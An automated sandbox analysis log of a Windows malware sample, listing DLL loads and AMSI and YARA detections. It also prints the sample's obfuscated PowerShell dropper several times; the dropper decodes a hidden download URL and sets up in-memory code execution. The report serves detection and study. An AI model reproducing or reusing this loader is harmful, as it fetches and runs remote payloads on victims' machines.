              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: ystem.Core.pdb/ source: powershell.exe, 00000005.00000002.1714023781.0000000006DD5000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdbe source: powershell.exe, 00000005.00000002.1721313369.0000000007F34000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("POWERSHELL " <#Ilks Kapelmester Macrographic Irena Miseres Appendices Larcenic #>;$Hogward194='Halskdens';<#Tvtni", "0")
              Source: Yara matchFile source: 00000005.00000002.1723278711.00000000089D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1722877673.0000000008160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.1522950843.0000028F64B54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1704835374.0000000005518000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Lophiostomous)$gloBal:KOLERa = [SystEM.texT.EnCODING]::asCii.GetsTRiNg($SAbler)$gLoBal:dOmkaPELLers=$KoLErA.suBStRiNg($leviStICUm,$paRAgRaffEr)<#Carcanetted Begad Urochordate Conines
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((ladron $Majolist $beridere), (Inflood @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Vandrerne = [AppDomain]::CurrentDomain.GetAssemblies()$global:Smiling
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Skumplendes)), $Mozzettas).DefineDynamicModule($Prespreading73, $false).DefineType($Helioid, $langrels, [System.MulticastDelegate])$Pr
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Lophiostomous)$gloBal:KOLERa = [SystEM.texT.EnCODING]::asCii.GetsTRiNg($SAbler)$gLoBal:dOmkaPELLers=$KoLErA.suBStRiNg($leviStICUm,$paRAgRaffEr)<#Carcanetted Begad Urochordate Conines
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Ilks Kapelmester Macrographic Irena Miseres Appendices Larcenic #>;$Hogward194='Halskdens';<#Tvtningernes Sporendes Cortin #>;$Nonputting=$Reorchestrate+$host.UI; function Roosting($Uncrystalled){If ($Nonputting) {$Generiske++;}$Getid=$Kommunikationsformen+$Uncrystalled.'Length'-$Generiske; for( $Pseudoemotional=5;$Pseudoemotional -lt $Getid;$Pseudoemotional+=6){$Mandaars=$Pseudoemotional;$Ulempevilkaarene122+=$Uncrystalled[$Pseudoemotional];$klynkene='Xanthipperne';}$Ulempevilkaarene122;}function Outsprint($Pseudoemotionalncestuous8){ . ($Nonsubtility) ($Pseudoemotionalncestuous8);}$Lame=Roosting ' fresMSig loSel gzPododiVoltalKnaldlPladsaSenne/Astas ';$Lame+=Roosting 'Taarn5Gauge. Crab0Brneh Inob(Raps WKomediCulvenHumpldSkippo NonrwLaur sTakst Dks lNQuay TApost Haand1Sec n0 ,ykm.Bri,a0Vejbr;hackw TrykfWreskoi,outrn Pria6Non o4H pot;Pt,ry therox Darl6Re ar4 tu,i; redi Pejlir istyvTypis:Omste1Maall3Uhlan1 Flu..Subsi0,arde)S lvc ApofeGEksore SamtcGrundkWinecoRet r/O tje2Requ 0S,rap1 Phen0.llel0Wa li1Lacca0Udsag1skyt, DobbeFBr ndiVandsrtamtaeForegfProteoSjuskxGlass/Lgkno1Dives3Hildi1emalj.Taile0O phy ';$Skibsprovianteringens=Roosting ' StatU UltrsUdsuge FinaR Akro-AlkohAAcolygAsylbeIreniNheftetsec,r ';$Discanonize=Roosting 'sulemh RetstPladetHyperpBrow,sBlufr:Atrsg/Dimet/ Syn,dBistrr ElgtiTvedevDreneeElorg.Smughg Spo oWeb uoOoriagStormlColleeUpbra. OmorcN namoMfikkmIm er/camemu remicOperc?UdkmpeDyne xN.nrap oceloTra,srWreattR.esu= udedDagbaoIndsnwRomannFodbolAelu oRecuraNgtfldLe le&Sy taiFremkdUnsac= .rig1 Hastq oppo2KerneSVari NB ysk6DashedAblew6Flekss nforfPopulcAnthrOMon iENitr,eKa.enx,reenGTrope1Se ar9.lankWBjelia EuphNSams,LD finkMis twBiddeATele,tProdutCorke4 ejldXRa et_AntirkGruttCAdelsyOphth ';$Elysisk57=Roosting 'Ou ha>Se is ';$Nonsubtility=Roosting 'LibysiFo ruETactaXHisto ';$Uncapitalizeds='Budcentralens';$Markedsundersgelser='\Bindehindens.Stu';Outsprint (Roosting 'Tu ul$I stigAfrohllsgngOFavo,BSuperaP otelOma d: .yvebSlibeA WhisgantihM TolvAulivsN edviDSmaareDispaN.nderSoxyty= Sted$KolleEApo eNSandpv Rdli:VidovAPallep KellpChartdHotheAadde tphalaaOphol+Beaum$Ov remDecimA S emrQuattKFrokoEUncopDNonbis FimsUSoljeNFantadPu keePatteRSklmeS red,GSy deeSkabeLLrebrSBecl,ePr darKnop ');Outsprint (Roosting ' p nd$eutonGUro ll Cit OHypodb RegnAAkkusL aski: rissaRvegrcActsbhB mboEselvinBouldILisseAInsurLDroll=Chefp$haem D oloIValyls S idcSpindA rounNSandbO Radin BrodI heckz Fjere,katt.resatSR,ppoPTel,ml C ssi Eus tAddee(mor o$OverseDrevnlReh.bYAetiosKonf,Iw lpaSSubstKEksam5Minis7Sig a)Kulde ');Outsprint (Roosting 'frem [KitefnTudedESki,et nonf.K.abtSFrarveNeurorAltsaVLssalIMormyC,utofe Torsp disgoEjendiE,sasn Fr mTAfstrmFugleaA couN FlydA PortG iod eKre.trNorma]Metra:Myste: irres ByggE BlancU.komuTelefRDin,aiLok.ltJap nYYndliPTheetrDblbeOJinritSadelO,etaiCUnderOA,cuslPen i Prea= Chut Creep[MiswonOmredEAfrunT Str,.Aa,tuSUd
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Ilks Kapelmester Macrographic Irena Miseres Appendices Larcenic #>;$Hogward194='Halskdens';<#Tvtningernes Sporendes Cortin #>;$Nonputting=$Reorchestrate+$host.UI; function Roosting($Uncrystalled){If ($Nonputting) {$Generiske++;}$Getid=$Kommunikationsformen+$Uncrystalled.'Length'-$Generiske; for( $Pseudoemotional=5;$Pseudoemotional -lt $Getid;$Pseudoemotional+=6){$Mandaars=$Pseudoemotional;$Ulempevilkaarene122+=$Uncrystalled[$Pseudoemotional];$klynkene='Xanthipperne';}$Ulempevilkaarene122;}function Outsprint($Pseudoemotionalncestuous8){ . ($Nonsubtility) ($Pseudoemotionalncestuous8);}$Lame=Roosting ' fresMSig loSel gzPododiVoltalKnaldlPladsaSenne/Astas ';$Lame+=Roosting 'Taarn5Gauge. Crab0Brneh Inob(Raps WKomediCulvenHumpldSkippo NonrwLaur sTakst Dks lNQuay TApost Haand1Sec n0 ,ykm.Bri,a0Vejbr;hackw TrykfWreskoi,outrn Pria6Non o4H pot;Pt,ry therox Darl6Re ar4 tu,i; redi Pejlir istyvTypis:Omste1Maall3Uhlan1 Flu..Subsi0,arde)S lvc ApofeGEksore SamtcGrundkWinecoRet r/O tje2Requ 0S,rap1 Phen0.llel0Wa li1Lacca0Udsag1skyt, DobbeFBr ndiVandsrtamtaeForegfProteoSjuskxGlass/Lgkno1Dives3Hildi1emalj.Taile0O phy ';$Skibsprovianteringens=Roosting ' StatU UltrsUdsuge FinaR Akro-AlkohAAcolygAsylbeIreniNheftetsec,r ';$Discanonize=Roosting 'sulemh RetstPladetHyperpBrow,sBlufr:Atrsg/Dimet/ Syn,dBistrr ElgtiTvedevDreneeElorg.Smughg Spo oWeb uoOoriagStormlColleeUpbra. OmorcN namoMfikkmIm er/camemu remicOperc?UdkmpeDyne xN.nrap oceloTra,srWreattR.esu= udedDagbaoIndsnwRomannFodbolAelu oRecuraNgtfldLe le&Sy taiFremkdUnsac= .rig1 Hastq oppo2KerneSVari NB ysk6DashedAblew6Flekss nforfPopulcAnthrOMon iENitr,eKa.enx,reenGTrope1Se ar9.lankWBjelia EuphNSams,LD finkMis twBiddeATele,tProdutCorke4 ejldXRa et_AntirkGruttCAdelsyOphth ';$Elysisk57=Roosting 'Ou ha>Se is ';$Nonsubtility=Roosting 'LibysiFo ruETactaXHisto ';$Uncapitalizeds='Budcentralens';$Markedsundersgelser='\Bindehindens.Stu';Outsprint (Roosting 'Tu ul$I stigAfrohllsgngOFavo,BSuperaP otelOma d: .yvebSlibeA WhisgantihM TolvAulivsN edviDSmaareDispaN.nderSoxyty= Sted$KolleEApo eNSandpv Rdli:VidovAPallep KellpChartdHotheAadde tphalaaOphol+Beaum$Ov remDecimA S emrQuattKFrokoEUncopDNonbis FimsUSoljeNFantadPu keePatteRSklmeS red,GSy deeSkabeLLrebrSBecl,ePr darKnop ');Outsprint (Roosting ' p nd$eutonGUro ll Cit OHypodb RegnAAkkusL aski: rissaRvegrcActsbhB mboEselvinBouldILisseAInsurLDroll=Chefp$haem D oloIValyls S idcSpindA rounNSandbO Radin BrodI heckz Fjere,katt.resatSR,ppoPTel,ml C ssi Eus tAddee(mor o$OverseDrevnlReh.bYAetiosKonf,Iw lpaSSubstKEksam5Minis7Sig a)Kulde ');Outsprint (Roosting 'frem [KitefnTudedESki,et nonf.K.abtSFrarveNeurorAltsaVLssalIMormyC,utofe Torsp disgoEjendiE,sasn Fr mTAfstrmFugleaA couN FlydA PortG iod eKre.trNorma]Metra:Myste: irres ByggE BlancU.komuTelefRDin,aiLok.ltJap nYYndliPTheetrDblbeOJinritSadelO,etaiCUnderOA,cuslPen i Prea= Chut Creep[MiswonOmredEAfrunT Str,.Aa,tuSUd
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Ilks Kapelmester Macrographic Irena Miseres Appendices Larcenic #>;$Hogward194='Halskdens';<#Tvtningernes Sporendes Cortin #>;$Nonputting=$Reorchestrate+$host.UI; function Roosting($Uncrystalled){If ($Nonputting) {$Generiske++;}$Getid=$Kommunikationsformen+$Uncrystalled.'Length'-$Generiske; for( $Pseudoemotional=5;$Pseudoemotional -lt $Getid;$Pseudoemotional+=6){$Mandaars=$Pseudoemotional;$Ulempevilkaarene122+=$Uncrystalled[$Pseudoemotional];$klynkene='Xanthipperne';}$Ulempevilkaarene122;}function Outsprint($Pseudoemotionalncestuous8){ . ($Nonsubtility) ($Pseudoemotionalncestuous8);}$Lame=Roosting ' fresMSig loSel gzPododiVoltalKnaldlPladsaSenne/Astas ';$Lame+=Roosting 'Taarn5Gauge. Crab0Brneh Inob(Raps WKomediCulvenHumpldSkippo NonrwLaur sTakst Dks lNQuay TApost Haand1Sec n0 ,ykm.Bri,a0Vejbr;hackw TrykfWreskoi,outrn Pria6Non o4H pot;Pt,ry therox Darl6Re ar4 tu,i; redi Pejlir istyvTypis:Omste1Maall3Uhlan1 Flu..Subsi0,arde)S lvc ApofeGEksore SamtcGrundkWinecoRet r/O tje2Requ 0S,rap1 Phen0.llel0Wa li1Lacca0Udsag1skyt, DobbeFBr ndiVandsrtamtaeForegfProteoSjuskxGlass/Lgkno1Dives3Hildi1emalj.Taile0O phy ';$Skibsprovianteringens=Roosting ' StatU UltrsUdsuge FinaR Akro-AlkohAAcolygAsylbeIreniNheftetsec,r ';$Discanonize=Roosting 'sulemh RetstPladetHyperpBrow,sBlufr:Atrsg/Dimet/ Syn,dBistrr ElgtiTvedevDreneeElorg.Smughg Spo oWeb uoOoriagStormlColleeUpbra. OmorcN namoMfikkmIm er/camemu remicOperc?UdkmpeDyne xN.nrap oceloTra,srWreattR.esu= udedDagbaoIndsnwRomannFodbolAelu oRecuraNgtfldLe le&Sy taiFremkdUnsac= .rig1 Hastq oppo2KerneSVari NB ysk6DashedAblew6Flekss nforfPopulcAnthrOMon iENitr,eKa.enx,reenGTrope1Se ar9.lankWBjelia EuphNSams,LD finkMis twBiddeATele,tProdutCorke4 ejldXRa et_AntirkGruttCAdelsyOphth ';$Elysisk57=Roosting 'Ou ha>Se is ';$Nonsubtility=Roosting 'LibysiFo ruETactaXHisto ';$Uncapitalizeds='Budcentralens';$Markedsundersgelser='\Bindehindens.Stu';Outsprint (Roosting 'Tu ul$I stigAfrohllsgngOFavo,BSuperaP otelOma d: .yvebSlibeA WhisgantihM TolvAulivsN edviDSmaareDispaN.nderSoxyty= Sted$KolleEApo eNSandpv Rdli:VidovAPallep KellpChartdHotheAadde tphalaaOphol+Beaum$Ov remDecimA S emrQuattKFrokoEUncopDNonbis FimsUSoljeNFantadPu keePatteRSklmeS red,GSy deeSkabeLLrebrSBecl,ePr darKnop ');Outsprint (Roosting ' p nd$eutonGUro ll Cit OHypodb RegnAAkkusL aski: rissaRvegrcActsbhB mboEselvinBouldILisseAInsurLDroll=Chefp$haem D oloIValyls S idcSpindA rounNSandbO Radin BrodI heckz Fjere,katt.resatSR,ppoPTel,ml C ssi Eus tAddee(mor o$OverseDrevnlReh.bYAetiosKonf,Iw lpaSSubstKEksam5Minis7Sig a)Kulde ');Outsprint (Roosting 'frem [KitefnTudedESki,et nonf.K.abtSFrarveNeurorAltsaVLssalIMormyC,utofe Torsp disgoEjendiE,sasn Fr mTAfstrmFugleaA couN FlydA PortG iod eKre.trNorma]Metra:Myste: irres ByggE BlancU.komuTelefRDin,aiLok.ltJap nYYndliPTheetrDblbeOJinritSadelO,etaiCUnderOA,cuslPen i Prea= Chut Creep[MiswonOmredEAfrunT Str,.Aa,tuSUdJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF7BFED00BD pushad ; iretd 2_2_00007FF7BFED00C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF7BFED0952 push E95B7CD0h; ret 2_2_00007FF7BFED09C9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF7BFFA704A pushad ; iretd 2_2_00007FF7BFFA704B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_029EC898 pushfd ; ret 5_2_029EC899
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_088C182E push edi; retf 5_2_088C186D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_088C2B1C push ss; ret 5_2_088C2B1D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_088C3B34 pushad ; retf 5_2_088C3B35
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_088C0C25 push es; ret 5_2_088C0C35
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_088C0F2D push esp; iretd 5_2_088C0F34
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_088C4196 push eax; retf 5_2_088C41A0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04260C25 push es; ret 7_2_04260C35
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04260F2D push esp; iretd 7_2_04260F34
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0426182E push edi; retf 7_2_0426186D
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04264196 push eax; retf 7_2_042641A0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04263B34 pushad ; retf 7_2_04263B35
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04262B1C push ss; ret 7_2_04262B1D
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
